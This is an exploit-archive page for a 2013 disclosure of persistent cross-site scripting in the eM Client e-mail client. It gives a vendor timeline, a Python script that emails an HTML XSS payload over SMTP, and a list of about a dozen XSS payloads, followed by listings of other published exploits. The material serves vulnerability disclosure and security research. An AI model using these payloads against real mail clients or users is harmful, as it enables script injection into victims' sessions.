Menu

Search for hundreds of thousands of exploits

"eM Client e-mail client 5.0.18025.0 - Persistent Cross-Site Scripting"

Author

Exploit author

loneferret

Platform

Exploit platform

windows

Release date

Exploit published date

2013-09-10

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
#!/usr/bin/python
'''

Author: loneferret of Offensive Security
Date: 22-08-2013
Product: eM Client for Windows
Version: 5.0.18025.0 (previous versions and other platforms may be vulnerable)
Vendor Site: http://www.emclient.com/
Software Download: http://www.emclient.com/download

Tested on: Windows XP Pro SP3 Eng.
Tested on: Windows 7 Pro SP1 Eng.
eM Client: Using default settings


E-mail client is vulnerable to stored XSS. Either opening or viewing the e-mail and you 
get an annoying alert box etc etc etc.
Injection Point:  Body
 
Gave vendor 7 days to reply in order to co-ordinate a release date. 
Timeline:
23 Aug 2013: Tentative release date 30 Aug 2013
23 Aug 2013: Vulnerability reported to vendor. Provided a list of payloads
26 Aug 2013: No response from vendor, sent a reminder email
27 Aug 2013: Vendor responded, will issue update to fix within 14 days
27 Aug 2013: Tentative release date pushed to September 10th 2013
27 Aug 2013: Replied to vendor with new date
09 Sep 2013: Contacted vendor with remainder of release date
09 Sep 2013: Vendor responded with go ahead with release
10 Sep 2013: Public release

Solution: Upgrade/update to latest version (haven't tested yet)

'''

import smtplib, urllib2

payload = '''<DIV STYLE="background-image: url(javascript:alert('XSS'))">'''

def sendMail(dstemail, frmemail, smtpsrv, username, password):
        msg  = "From: hacker@offsec.local\n"
        msg += "To: victim@offsec.local\n"
        msg += 'Date: Today\r\n'
        msg += "Subject: XSS payload\n"
        msg += "Content-type: text/html\n\n"
        msg += payload + "\r\n\r\n"
        server = smtplib.SMTP(smtpsrv)
        server.login(username,password)
        try:
                server.sendmail(frmemail, dstemail, msg)
        except Exception, e:
                print "[-] Failed to send email:"
                print "[*] " + str(e)
        server.quit()

username = "test@test.com"
password = "123456"
dstemail = "test@test.com"
frmemail = "hacker@offsec.local"
smtpsrv  = "172.16.61.165"

print "[*] Sending Email"
sendMail(dstemail, frmemail, smtpsrv, username, password)

'''
# Payloads
[+] Payload 1 : DIV background-image 1
[+] Code for 1 : <DIV STYLE="background-image: url(javascript:alert('XSS'))">
------------
[+] Payload 2 : DIV background-image 2
[+] Code for 2 : <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
------------
[+] Payload 3 : DIV expression
[+] Code for 3 : <DIV STYLE="width: expression(alert('XSS'));">
------------
[+] Payload 4 : IMG STYLE w/expression
[+] Code for 4 : exp/*<XSS STYLE='no\xss:noxss("*//*");
xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
------------
[+] Payload 5 : List-style-image
[+] Code for 5 : <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
------------
[+] Payload 6 : STYLE w/Comment
[+] Code for 6 : <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
------------
[+] Payload 7 : STYLE w/Anonymous HTML
[+] Code for 7 : <XSS STYLE="xss:expression(alert('XSS'))">
------------
[+] Payload 8 : STYLE w/background-image
[+] Code for 8 : <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
------------
[+] Payload 9 : TABLE
[+] Code for 9 : <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
------------
[+] Payload 10 : TD
[+] Code for 11 : <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
------------
[+] Payload 12 : Commented-out Block
[+] Code for 12 : <!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
----
'''
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2016-08-16 "Pi-Hole Web Interface 2.8.1 - Persistent Cross-Site Scripting in Whitelist/Blacklist" webapps linux loneferret
2015-12-06 "Cyclope Employee Surveillance 8.6.1 - Insecure File Permissions" local windows loneferret
2013-09-10 "eM Client e-mail client 5.0.18025.0 - Persistent Cross-Site Scripting" remote windows loneferret
2013-08-23 "dreamMail e-mail client 4.6.9.2 - Persistent Cross-Site Scripting" remote windows loneferret
2012-11-21 "PHP Server Monitor - Persistent Cross-Site Scripting" webapps php loneferret
2012-11-19 "weBid 1.0.5 - Directory Traversal" webapps php loneferret
2012-10-10 "ServersCheck Monitoring Software 9.0.12/9.0.14 - Persistent Cross-Site Scripting" webapps multiple loneferret
2012-10-08 "Web Help Desk by SolarWinds - Persistent Cross-Site Scripting" webapps php loneferret
2012-08-23 "op5 Monitoring 5.4.2 - VM Applicance Multiple Vulnerabilities" webapps php loneferret
2012-08-21 "Clipbucket 2.5 - Blind SQL Injection" webapps php loneferret
2012-08-21 "Clipbucket 2.5 - Directory Traversal" webapps php loneferret
2012-08-18 "ManageEngine OpUtils 6.0 - Persistent Cross-Site Scripting" webapps windows loneferret
2012-08-17 "Jaow CMS 2.3 - Blind SQL Injection" webapps php loneferret
2012-08-15 "Cyclope Employee Surveillance Solution 6.0 6.1.0 6.2.0 - Multiple Vulnerabilities" webapps windows loneferret
2012-08-15 "sphpforum 0.4 - Multiple Vulnerabilities" webapps php loneferret
2012-08-12 "Spytech NetVizor 6.1 - 'services.exe' Denial of Service" dos windows loneferret
2012-08-09 "Cyclope Employee Surveillance Solution 6.0/6.1.0/6.2.0/6.2.1/6.3.0 - SQL Injection" webapps windows loneferret
2012-08-08 "smartermail free 9.2 - Persistent Cross-Site Scripting" webapps windows loneferret
2012-08-08 "WordPress Plugin ThreeWP Email Reflector 1.13 - Persistent Cross-Site Scripting" webapps php loneferret
2012-08-08 "xeams email server 4.4 build 5720 - Persistent Cross-Site Scripting" webapps windows loneferret
2012-08-08 "afterlogic mailsuite pro (VMware Appliance) 6.3 - Persistent Cross-Site Scripting" webapps windows loneferret
2012-08-08 "winwebmail server 3.8.1.6 - Persistent Cross-Site Scripting" webapps windows loneferret
2012-08-08 "OTRS Open Technology Real Services 3.1.4 - Persistent Cross-Site Scripting" webapps windows loneferret
2012-08-08 "Surgemail 6.0a4 - Persistent Cross-Site Scripting" webapps windows loneferret
2012-08-08 "WordPress Plugin mini mail Dashboard widget 1.42 - Persistent Cross-Site Scripting" webapps php loneferret
2012-08-08 "ManageEngine ServiceDesk Plus 8.1 - Persistent Cross-Site Scripting" webapps windows loneferret
2012-08-08 "T-dah Webmail Client 3.2.0-2.3 - Persistent Cross-Site Scripting" webapps php loneferret
2012-08-08 "WordPress Plugin simplemail 1.0.6 - Persistent Cross-Site Scripting" webapps php loneferret
2012-08-08 "WordPress Plugin postie 1.4.3 - Persistent Cross-Site Scripting" webapps php loneferret
2012-08-08 "Alt-N MDaemon free 12.5.4 - Persistent Cross-Site Scripting" webapps windows loneferret
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.